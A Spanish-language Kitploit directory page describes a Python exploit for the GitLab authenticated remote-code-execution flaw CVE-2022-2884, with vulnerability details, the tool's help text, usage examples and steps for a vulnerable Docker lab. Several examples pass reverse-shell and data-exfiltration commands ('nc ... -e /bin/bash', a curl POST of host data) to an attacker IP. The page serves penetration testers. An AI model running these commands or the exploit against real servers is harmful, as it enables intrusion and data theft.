Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
gitlab_rce_cve-2022-2884 — Explota la vulnerabilidad de RCE autenticada de GitLab conocida como CVE-2022-2884. | Kitploit
Herramientas/GitHubGitHub/m3ssap0/gitlab_rce_cve-2022-2884
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubm3ssap0/gitlab_rce_cve-2022-2884

gitlab_rce_cve-2022-2884

Explota la vulnerabilidad de RCE autenticada de GitLab conocida como CVE-2022-2884.

Ver Repositorio
2663hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

gitlab_rce_cve-2022-2884

Este es un programa Python3 que explota la vulnerabilidad de RCE autenticada de GitLab conocida como CVE-2022-2884.

DESCARGO DE RESPONSABILIDAD

Esta herramienta está destinada a ingenieros de seguridad y personal de appsec para evaluaciones de seguridad. Úsela de manera responsable. No asumo responsabilidad por la forma en que alguien use esta aplicación. NO soy responsable de los daños causados ni de los delitos cometidos al usar esta herramienta.

Información de la vulnerabilidad

  • CVE-ID: CVE-2022-2884
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2884
  • Description: Una vulnerabilidad en GitLab CE/EE que afecta a todas las versiones desde 11.3.4 anteriores a 15.1.5, 15.2 a 15.2.3, 15.3 a 15.3.1 permite que un usuario autenticado logre ejecución remota de código a través del endpoint de Import from GitHub API.
  • Vendor link: https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/

Ayuda

root@kitploit:~
$ ./gitlab_rce_cve-2022-2884.py --help
usage: gitlab_rce_cve-2022-2884.py [-h] -u URL -pt PRIVATE_TOKEN [-tn TARGET_NAMESPACE] -a ADDRESS [-p PORT] [-s] -c COMMAND [-d DELAY] [-v]

Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - v1.0 (2022-12-25)

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of the victim GitLab
  -pt PRIVATE_TOKEN, --private-token PRIVATE_TOKEN
                        private token of GitLab
  -tn TARGET_NAMESPACE, --target-namespace TARGET_NAMESPACE
                        target namespace of GitLab (default is 'root')
  -a ADDRESS, --address ADDRESS
                        IP address of the attacker machine
  -p PORT, --port PORT  TCP port of the attacker machine (default is 1337)
  -s, --https           set if the attacker machine is exposed via HTTPS
  -c COMMAND, --command COMMAND
                        the command to execute
  -d DELAY, --delay DELAY
                        seconds of delay to wait for the exploit to complete
  -v, --verbose         verbose mode

Ejemplos

root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "id | nc 1.2.3.4 6669"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "(hostname; ps aux) | curl 1.2.3.4:6669 -X POST --data-binary @- "
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "echo 'test' > /tmp/test"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -c "nc 1.2.3.4 6669 -e /bin/bash" -d 180
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -v -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -a 1.2.3.4 -p 1337 -c "nc 1.2.3.4 6669 -e /bin/bash"
root@kitploit:~
./gitlab_rce_cve-2022-2884.py -u http://victim.gitlab.server -pt "glpat-YourGitLabPrivateToken" -tn root -a 1.2.3.4 -p 1337 -s -c "nc 1.2.3.4 6669 -e /bin/bash"

Aplicación vulnerable

Se puede configurar una aplicación vulnerable con los siguientes comandos.

root@kitploit:~
export GITLAB_HOME=/srv/gitlab
docker run --detach --rm \
           --hostname gitlab.example.com \
           --publish 443:443 --publish 80:80 --publish 22:22 \
           --name vuln-gitlab \
           --volume $GITLAB_HOME/config:/etc/gitlab \
           --volume $GITLAB_HOME/logs:/var/log/gitlab \
           --volume $GITLAB_HOME/data:/var/opt/gitlab \
           --shm-size 256m \
           gitlab/gitlab-ce:15.3.0-ce.0

Puede tomar un tiempo antes de que el contenedor Docker comience a responder a las consultas. Luego conéctese a http://localhost.

Inicie sesión con el nombre de usuario root y la contraseña del siguiente comando.

root@kitploit:~
docker exec -it vuln-gitlab grep 'Password:' /etc/gitlab/initial_root_password

Para probar el exploit localmente, debe agregar --network="host" al comando docker run y eliminar las restricciones para solicitudes salientes en GitLab:

  • conéctese a http://localhost/admin/application_settings/network;
  • expanda la sección "Outbound requests";
  • marque "Allow requests to the local network from web hooks and services";
  • agregue 127.0.0.1 al cuadro de texto "Local IP addresses and domain names that hooks and services may access";
  • guarde los cambios.

El requisito previo del exploit es tener un token privado en GitLab:

  • conéctese a http://localhost/-/profile/personal_access_tokens;
  • genere un token con al menos el alcance api.

Autores

  • Antonio Francesco Sardella - implementación principal - m3ssap0

Licencia

Consulte el archivo LICENSE para obtener más detalles.

Agradecimientos

  • yvvdwf, el investigador de seguridad que descubrió la vulnerabilidad.
Descargar herramienta